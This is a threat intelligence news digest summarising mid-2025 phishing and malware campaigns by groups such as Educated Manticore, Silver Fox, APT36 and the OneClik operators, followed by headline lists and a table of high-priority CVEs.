Skip to main content
Skip to footer
Educated Manticore targets Israeli academics and cybersecurity experts to steal credentials
Starting mid-June 2025, Check Point researchers observed a spear phishing campaign, attributed to the Iranian threat actor Educated Manticore, that is targeting Israeli journalists, high-profile cybersecurity experts, and computer science professors from leading Israeli universities. The group aims to direct victims to fake Gmail, Outlook, or Yahoo login pages, or Google Meet invitations to steal credentials. Victims are approached via email or WhatsApp messages purporting to come from a researcher or journalist seeking to have a discussion. The initial messages do not contain any links, with the attackers first gaining the victim’s trust before sending links to the custom phishing kits. The phishing kits are implemented as a Single Page Application built with React and use dynamic page routing, while real-time WebSocket connections are used to send stolen data.
Shadow Vector campaign uses SVG smuggling to target Colombia with AsyncRAT and RemcosRAT
Acronis researchers discovered an active spear phishing campaign, dubbed Shadow Vector, targeting users in Colombia with malicious SVG files masquerading as urgent court notifications to deliver AsyncRAT and RemcosRAT. The phishing emails contain a link to a password-protected ZIP archive hosted on public file-sharing platforms such as Bitbucket, Discord CDN, and YDRAY. The archive contains a legitimate and benign DLL and a malicious DLL, with the latter sideloaded to allow the malware to run within a trusted process and evade detection. Once server communication is established, the malware transmits victim details and checks for the presence of cryptocurrency wallets and specific browser extensions. A newer version of the campaign adopts a modular approach and deploys a loader associated with Katz Stealer.
Silver Fox targets healthcare and public sector with trojanised medical software
Picus Security researchers identified a multi-stage campaign by the Silver Fox advanced persistent threat group targeting healthcare delivery organisations with trojanised medical software and cloud infrastructure. The campaign aims to deploy remote access tools, such as Winos 4.0, disable anti-virus defences, and exfiltrate data from healthcare and public sector targets. In one campaign, Silver Fox embedded backdoors in Philips DICOM viewers, EmEditor, and system driver utilities, which functioned as first-stage loaders and downloaded encrypted payloads from Alibaba Cloud storage. The campaign ultimately deployed Winos 4.0, a keylogger, and a cryptocurrency miner, with a scheduled task registered to maintain persistence. Silver Fox has also leveraged backdoored installers for applications such as Google Chrome, VPN clients, deepfake tools, and artificial intelligence tools. Another campaign distributed spear phishing emails impersonating Taiwan’s National Taxation Bureau. Similarly, a campaign dubbed Operation Holding Hands targeted organisations in Japan and Taiwan using digitally–signed fake salary notices.
APT36 phishing campaign targets Indian defence personnel with credential-stealing malware
CYFIRMA researchers observed the advanced persistent threat group, APT36, actively targeting Indian defence personnel through highly sophisticated phishing campaigns. The group distributes phishing emails containing malicious PDF attachments that are designed to resemble official government documents. The emails contain a link that redirect victims to a phishing page imitating the login interface of India’s National Informatics Centre, which ultimately leads to the installation of a ZIP archive containing a credential-stealing malware disguised as a legitimate application. The malware is executed in memory and is capable of interacting with user sessions, injecting code, evading detection, maintaining persistence, and more.
OneClik campaign abuses ClickOnce to target energy, oil and gas sector with RunnerBeacon
Trellix researchers discovered a sophisticated malware campaign, dubbed OneClik, that is targeting the energy, oil, and gas sector via phishing attacks and the exploitation of Microsoft ClickOnce. Three variants of the campaign, v1a, BPI-MDM, and v1d, were identified, with each deploying a Golang backdoor, dubbed RunnerBeacon via a .NET loader, dubbed OneClikNet, that uses AppDomainManager hijacking. Each version of the campaign has evolved with advanced tactics and C2 obfuscation. The attackers send emails with links to a fake ‘hardware analysis’ site, which, once visited, leads to a ClickOnce manifest disguised as a legitimate tool. The threat actors use legitimate AWS cloud services for their C2 to evade detection. The tactics, tools, and techniques used in the campaign align with China-linked actors, however, the researchers have not made a definitive attribution.
Ransomware
Qilin ransomware attack on NHS supplier contributed to patient fatalityThe Register – Security – Jun 26 2025Dire Wolf Ransomware Comes Out Snarling, Bites Technology, ManufacturingDark Reading – Jun 25 2025The State of Ransomware 2025Sophos – Jun 24 2025Revil ransomware members released after time served on carding chargesBleeping Computer – Jun 23 2025Qilin Ransomware Adds “Call Lawyer” Feature to Pressure Victims for Larger RansomsThe Hacker News – Jun 20 2025
Financial Services
Cybercriminals Abuse Open-Source Tools To Target Africa’s Financial SectorUnit 42 – Palo Alto Networks Blog – Jun 24 2025Trezor’s support platform abused in crypto theft phishing attacksBleeping Computer – Jun 24 2025Cointelegraph and CoinMarketCap front ends compromised with scam links over the weekendCryptoSlate – Jun 23 2025Aflac Finds Suspicious Activity on US Network That May Impact Social Security Numbers, Other DataSecurityWeek RSS Feed – Jun 21 2025Declaration trap: Crypto Drainers masquerading as European Tax AuthoritiesGroup-IB – Jun 19 2025
Geopolitics
Another Wave: North Korean Contagious Interview Campaign Drops 35 New Malicious npm PackagesSocket – Jun 25 2025APT28 hackers use Signal chats to launch new malware attacks on UkraineBleeping Computer – Jun 23 2025Middle East Cyber Escalation: From Hacktivism to Sophisticated Threat OperationsGroup-IB – Jun 23 2025Unmasking A New China-Linked Covert ORB Network: Inside the LapDogs CampaignSecurityScorecard – Jun 23 2025Part 1: The Iran-Israel Cyber Standoff – The Hacktivist Front CloudSEK Blog – Jun 19 2025
High Priority Vulnerabilities
| Name | Software | Base Score |
Temp Score |
|
|---|---|---|---|---|
| CVE-2025-6543 | NetScaler Gateway | 8.1 | 7.7 | |
| Related: Critical flaw in NetScaler ADC and NetScaler Gateway exploited as zero-day | ||||
| CVE-2025-4322 | Motors Plugin | 9.8 | 7.1 | |
| Related: Attackers Actively Exploiting Critical Vulnerability in Motors Theme | ||||
| CVE-2025-49132 | panel | 10.0 | 8.4 | |
| Related: Recently patched maximum-severity remote code execution flaw in Pterodactyl actively exploited | ||||
| CVE-2025-27363 | FreeType | 8.1 | 5.6 | |
| Related: FreeType Zero-Day Found by Meta Exploited in Paragon Spyware Attacks | ||||
| CVE-2025-52921 | InnoShop | 4.7 | 4.6 | |
| Related: Multiple critical and high-severity flaws discovered in InnoShop | ||||